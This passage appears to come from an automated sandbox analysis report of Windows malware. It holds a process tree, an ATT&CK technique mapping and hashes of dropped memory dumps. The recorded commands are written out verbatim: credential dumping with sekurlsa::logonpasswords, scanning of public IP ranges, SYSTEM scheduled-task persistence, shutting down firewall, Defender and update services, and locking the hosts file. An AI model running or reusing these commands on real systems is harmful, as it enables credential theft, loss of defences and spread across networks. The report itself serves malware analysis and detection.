  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:244
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1332
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:5076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:548
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1512
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\yvccbdwlz\cttnbjmli\lvnuplabi.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\yvccbdwlz\cttnbjmli\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3416
- - C:\Windows\yvccbdwlz\cttnbjmli\lvnuplabi.exe
    C:\Windows\yvccbdwlz\cttnbjmli\lvnuplabi.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\yvccbdwlz\cttnbjmli\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3076
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\yvccbdwlz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\yvccbdwlz\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:876
- - C:\Windows\yvccbdwlz\Corporate\vfshost.exe
    C:\Windows\yvccbdwlz\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4312
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bkvuzyktn" /ru system /tr "cmd /c C:\Windows\ime\biebucb.exe"
  2⤵
  PID:3536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2872
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "bkvuzyktn" /ru system /tr "cmd /c C:\Windows\ime\biebucb.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yvebmpjmb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ivwjddbm\biebucb.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1624
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "yvebmpjmb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ivwjddbm\biebucb.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mgcrvdyci" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bzlikjnbm\iljmvq.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:704
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "mgcrvdyci" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bzlikjnbm\iljmvq.exe /p everyone:F"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2620
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4116
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3040
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3836
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1444
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2928
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:892
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2260
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2208
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1456
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4832
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:5036
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static set policy name=Bastards assign=y
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:3208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2864
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    PID:704
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:4332
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh firewall set opmode mode=disable
  2⤵
  PID:4448
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:372
- C:\Windows\SysWOW64\cmd.exe
  cmd /c netsh Advfirewall set allprofiles state off
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3832
- - C:\Windows\SysWOW64\netsh.exe
    netsh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - System Location Discovery: System Language Discovery
    PID:4116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  PID:4768
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    PID:1972
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:2928
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop WinDefend
  2⤵
  PID:3536
- - C:\Windows\SysWOW64\net.exe
    net stop WinDefend
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3132
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop WinDefend
      4⤵
      System Location Discovery: System Language Discovery
      PID:2948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop wuauserv
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1428
- - C:\Windows\SysWOW64\net.exe
    net stop wuauserv
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1444
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop wuauserv
      4⤵
      System Location Discovery: System Language Discovery
      PID:3572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config MpsSvc start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2724
- - C:\Windows\SysWOW64\sc.exe
    sc config MpsSvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:4316
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config SharedAccess start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4924
- - C:\Windows\SysWOW64\sc.exe
    sc config SharedAccess start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config WinDefend start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4772
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    PID:3836
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config wuauserv start= disabled
  2⤵
  PID:1424
- - C:\Windows\SysWOW64\sc.exe
    sc config wuauserv start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2400
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 804 C:\Windows\TEMP\yvccbdwlz\804.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2336
- C:\Windows\TEMP\xohudmc.exe
  C:\Windows\TEMP\xohudmc.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:4188
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 376 C:\Windows\TEMP\yvccbdwlz\376.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4460
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 2096 C:\Windows\TEMP\yvccbdwlz\2096.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2176
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 2672 C:\Windows\TEMP\yvccbdwlz\2672.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1920
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 2788 C:\Windows\TEMP\yvccbdwlz\2788.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3172
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 3044 C:\Windows\TEMP\yvccbdwlz\3044.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3452
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 2956 C:\Windows\TEMP\yvccbdwlz\2956.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4900
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 3724 C:\Windows\TEMP\yvccbdwlz\3724.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1516
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 3812 C:\Windows\TEMP\yvccbdwlz\3812.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3820
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 3884 C:\Windows\TEMP\yvccbdwlz\3884.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4212
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 3976 C:\Windows\TEMP\yvccbdwlz\3976.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3120
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 2888 C:\Windows\TEMP\yvccbdwlz\2888.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4460
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 4024 C:\Windows\TEMP\yvccbdwlz\4024.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4956
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 2444 C:\Windows\TEMP\yvccbdwlz\2444.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2324
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 1044 C:\Windows\TEMP\yvccbdwlz\1044.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3832
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 4724 C:\Windows\TEMP\yvccbdwlz\4724.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4916
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 2656 C:\Windows\TEMP\yvccbdwlz\2656.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3064
- C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe
  C:\Windows\TEMP\yvccbdwlz\ctkyggczb.exe -accepteula -mp 1008 C:\Windows\TEMP\yvccbdwlz\1008.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\yvccbdwlz\cttnbjmli\scan.bat
  2⤵
  PID:5064
- - C:\Windows\yvccbdwlz\cttnbjmli\iiqtmdpdb.exe
    iiqtmdpdb.exe TCP 138.199.0.1 138.199.255.255 445 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5892
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:5888
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6096
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6104
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:5748

C:\Windows\SysWOW64\nspfoo.exe
C:\Windows\SysWOW64\nspfoo.exe
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2860

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ivwjddbm\biebucb.exe /p everyone:F
1⤵
PID:3428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:988
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\ivwjddbm\biebucb.exe /p everyone:F
  2⤵
  PID:976

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\biebucb.exe
1⤵
PID:4256
- C:\Windows\ime\biebucb.exe
  C:\Windows\ime\biebucb.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4920

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bzlikjnbm\iljmvq.exe /p everyone:F
1⤵
PID:1620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4588
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\bzlikjnbm\iljmvq.exe /p everyone:F
  2⤵
  PID:4676

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ivwjddbm\biebucb.exe /p everyone:F
1⤵
PID:4264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4892
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\ivwjddbm\biebucb.exe /p everyone:F
  2⤵
  PID:4768

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c C:\Windows\ime\biebucb.exe
1⤵
PID:5260
- C:\Windows\ime\biebucb.exe
  C:\Windows\ime\biebucb.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:1572

C:\Windows\system32\cmd.EXE
C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bzlikjnbm\iljmvq.exe /p everyone:F
1⤵
PID:5428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
  2⤵
  PID:4232
- C:\Windows\system32\cacls.exe
  cacls C:\Windows\TEMP\bzlikjnbm\iljmvq.exe /p everyone:F
  2⤵
  PID:4740

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

OS Credential Dumping

T1003

LSASS Memory

T1003.001

Discovery

Network Service Discovery

T1046

Network Share Discovery

T1135

Query Registry

T1012

Remote System Discovery

T1018

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\TEMP\bzlikjnbm\config.json

Filesize
693B

MD5
f2d396833af4aea7b9afde89593ca56e

SHA1
08d8f699040d3ca94e9d46fc400e3feb4a18b96b

SHA256
d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34

SHA512
2f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01

Download Submit
C:\Windows\TEMP\yvccbdwlz\1008.dmp

Filesize
7.7MB

MD5
4df77c3e5a539af2c25c7aed9c5658c0

SHA1
181a177107db3c68c8925c53a49afc0ddd9e4fba

SHA256
20168bc0403547d04c2b7ca200e837cc51655df53b74797afd9eef4b722fda00

SHA512
b9f3514565b11b4ed7c25589c0295fc09e7ebc31fadc1f16193fecd6d74fef05987aab400ef223494a13c2847e2207a6dd12d8baf6793d8bd84ab9624fa5e3a5

Download Submit
C:\Windows\TEMP\yvccbdwlz\1044.dmp

Filesize
2.8MB

MD5
51de7138b1bd99b5327dc989d6149cc4

SHA1
168bab16cd79a330a79a11e225ca227a3934b56a

SHA256
b87b4aaa41c6c5e3a8762dd09a12aacebdb5289de58505bbedf7ca8e8766c5db

SHA512
6570cba2514fc11272fc727cf00684efea455625b50510d58dc7345870d12d56620fa5c11b4684230bc5a5d6cf37a2377b6e5b08fdf29417f7d928a750c19513

Download Submit
C:\Windows\TEMP\yvccbdwlz\2096.dmp

Filesize
4.2MB

MD5
5b04f159a42848518d42aaecac4674ba

SHA1
864e0a8608a19923371d7db6375f8f5d858addef

SHA256
f7c72dc75c877c96f7ab30f08f5a94589caa09828bee121e08816cc9278d8281

SHA512
80da50d57f7ec6da13de84a34d8ffd3090c42f77dda8c047ad09c1708be460f14e763a0c2dfcbc3ab6370549d7ae4ee6d625897dfa8e77cde759bcb077063fba

Download Submit
C:\Windows\TEMP\yvccbdwlz\2444.dmp

Filesize
8.5MB

MD5
2a7561ae7c82596537ef15f6b3149e4b

SHA1
eb113fa66712b4a810ef4907a40625dd2eecad93

SHA256
11300a279e15ead9b14157cf4cf37938bc74be28c55033a9a517e877b10a0354

SHA512
517b46cf59f8267ad0b2b034a5f5a27cdb24fe3b42d2681baecc4613de131b63e8eddd8972f3941d2f57fa515c55892bf53dabd46886258ddc62738e9833c68d

Download Submit
C:\Windows\TEMP\yvccbdwlz\2656.dmp

Filesize
6.7MB

MD5
5788467c4aeac1678e30a9e32d24f634

SHA1
5046613058f12c710db2ba6bfcd145778639bb40

SHA256
0caad120840e007661149a6b28f5944d7d9f35c56859e22112464ee3307591fc

SHA512
a83576b3006f62993a1ae4b60cd3bc346b1ab8ebf2b81207503c5b555277f6e185280ceae4e95143d09c0dd189333e61c34d4178467d7c0794b61acb783397b7

Download Submit
C:\Windows\TEMP\yvccbdwlz\2672.dmp

Filesize
4.0MB

MD5
8a3b84324f2a3b311572b2e3b41cba2f

SHA1
32811d7b20335a2417354e7b3fc5b548d17b460e

SHA256
cb9746aef3f2c2f6f2b2f0a3172eec94f92e4872d778ce3e22bffd42c1807b6c

SHA512
c0d9f2d5b34e01d10234ae07b9d8a4ef88212b15674359d6fcb5f153a63c3b144179b79a8c850c5fb71fe72cbb17e448c051944b504bdeeb25e65864d3ada85b

Download Submit
C:\Windows\TEMP\yvccbdwlz\2788.dmp

Filesize
7.5MB

MD5
7df2b320339ff01ce12b02deeef47c16

SHA1
a0a1f9caf73234f28908a41dd11fd373a86c6934

SHA256
cfc1cd67c564a76b4ea8e74f7b0527d125fb90e8c36b9d45009fabb4a7e70ac0

SHA512
8e9a7f6aea82ac00c6dc0944f8a332791e2fc02b2cc7292221442afb27fff4320e9ddef81893ddb32ec2919997eb3be6a905cc99cd8ee8b1e457801731456d22

Download Submit
C:\Windows\TEMP\yvccbdwlz\2888.dmp

Filesize
1.2MB

MD5
f23fe500ad95868c2067138ea8254097

SHA1
60f9f285cad0dafab291631263fc90f1cbbebd35

SHA256
593ef69933ad629365dcaae5ca614bb0b6fc0014b7f091c4b9abe5720e246b8c

SHA512
f859414422248840cd49472298ded2b45f66e69b24488397a7c3553f3d7c74df3916025b3f78eba9114662e7edb21262d9fe7f9a02aa35b95d196d3ce91c722b

Download Submit
C:\Windows\TEMP\yvccbdwlz\2956.dmp

Filesize
818KB

MD5
40b9b969f0883f7f01509798bad35612

SHA1
d5d69427c6e581b173186ecb1826324c69e226fb

SHA256
5624d1a514171e3fde44e83a6ead5cb2f267392d69c62e541eb868164f0cc181

SHA512
567e65ca7d664cde44f26f9f4de42631882f5979c01b34ab7abb092743a54423e060e434a0ef93a65c2ab1dff58e28cf88720f7fb701231859f885dbe003a355

Download Submit
C:\Windows\TEMP\yvccbdwlz\3044.dmp

Filesize
2.9MB

MD5
0af552c53349ba7340e48b8a02be7c4b

SHA1
1dea7bbabd9f36d51aeaa38f56f5f1b7c495b481

SHA256
fbe870ad261c63351d8eff0085c4c55656a22645556497fd77db42e0ad44e312

SHA512
5fa37f7012f9feb43a26f5f0640f75b92927097fc9ba06ebb8aa0b123a36ab3baf85f0fb7b5e5607044f570e5b981c18830cc741ef9d9c3be2e1cc808d3ccb28

Download Submit
C:\Windows\TEMP\yvccbdwlz\3724.dmp

Filesize
2.7MB

MD5
5b40066471f21039fb04141860baf3c1

SHA1
195c3eef74330077ff24920c6dda169442454981

SHA256
d36e1646e082085e1ebcfb98698f6d6c5dfe61472750c09da09448b25624357d

SHA512
2bb16201fac351cd6702e142a4bc062bc431629829fc4650851f5510d0d5e1e13b74c537f9a755791ab14f77c37c8b90bd4335e787a422ffbccb9d4613ae9dcf

Download Submit
C:\Windows\TEMP\yvccbdwlz\376.dmp

Filesize
33.5MB

MD5
18ea5c81a16fe40c545964a2edfdbf98

SHA1
bc0dd76a6db14281af76da1c88224aabaa3bf534

SHA256
3a34703dabe98fecef496fe60189ca0fd9068714a54981935b317e83cbec574a

SHA512
b9308d9a08b2dabcaa5db5e43b89a24e4a1b1cd4ced9075b5b66de274944c6c6dd2cda42f8e0eda0a0d762aa416e35c893e2cb0a3dd9d7d1413a49eb3562f2a3

Download Submit
C:\Windows\TEMP\yvccbdwlz\3812.dmp

Filesize
20.6MB

MD5
c1b7a8e87e4969f72b9002c10afbbb1b

SHA1
49e6fbaadf5fe16abe07bc383da87a165e169856

SHA256
451985b986d810e18f41a64e9ce5f9b41823a946e82b11dfa95211103d74e14a

SHA512
93778985e360cb0a217788e6a3426651a036571c41ad1aab4e33903364ef280874e55e99f6c0ae0b0bd173737f3df310ea80710662673d7a21b972dfd4b573c5

Download Submit
C:\Windows\TEMP\yvccbdwlz\3884.dmp

Filesize
4.6MB

MD5
1416998ac0dca68245311a68e336ace0

SHA1
e07c8600db66309c57107db37e109f3c2f1e5deb

SHA256
fe665c41e2835dd343176056dade6f7ec10d03cdb428ab3c264b7d0d3727df64

SHA512
b0c155ffcf35fccdb8190735c38dc135046732980cee8c032869076661a3f686efdb4d4e36001963b4539ba98bcc86fc42affca0da3ffbe5d15f8c3958d379f6

Download Submit
C:\Windows\TEMP\yvccbdwlz\3976.dmp

Filesize
45.5MB

MD5
1e9b2a513620fb343c1df7975a7792bf

SHA1
0b72337b1d5e55a055a27fd448c449ef114eabf7

SHA256
b88941dc35c3a261196daaa71a77048c27abfa7f813d930550267b9d36593b4b

SHA512
fe167a082369bf6e2647376484aeda220ef64e5eed675f1f8b3f9a8403c9f33b903110f309e8ca0bd639674456cf84d26f0b6f6058f9376966299af9ce25ddfc

Download Submit
C:\Windows\TEMP\yvccbdwlz\4024.dmp

Filesize
25.9MB

MD5
d5aaa2874f3f935764cebd745aa9805a

SHA1
a06ec450a1c40861599e568dd6bd1e17b46806f3

SHA256
19a3a39536c935895ffa5bf755d343469c7e00feee5e509918507ae8018e85d9

SHA512
194ba6b0bd8f376bb24a25e5fc5ad2965be61eb3958b4fcee4d6f2affc77eb12e4728ded23f342bcd9df380ba7497687c47e41a2d809407a03abec774ff9d8f8

Download Submit
C:\Windows\TEMP\yvccbdwlz\4724.dmp

Filesize
1.3MB

MD5
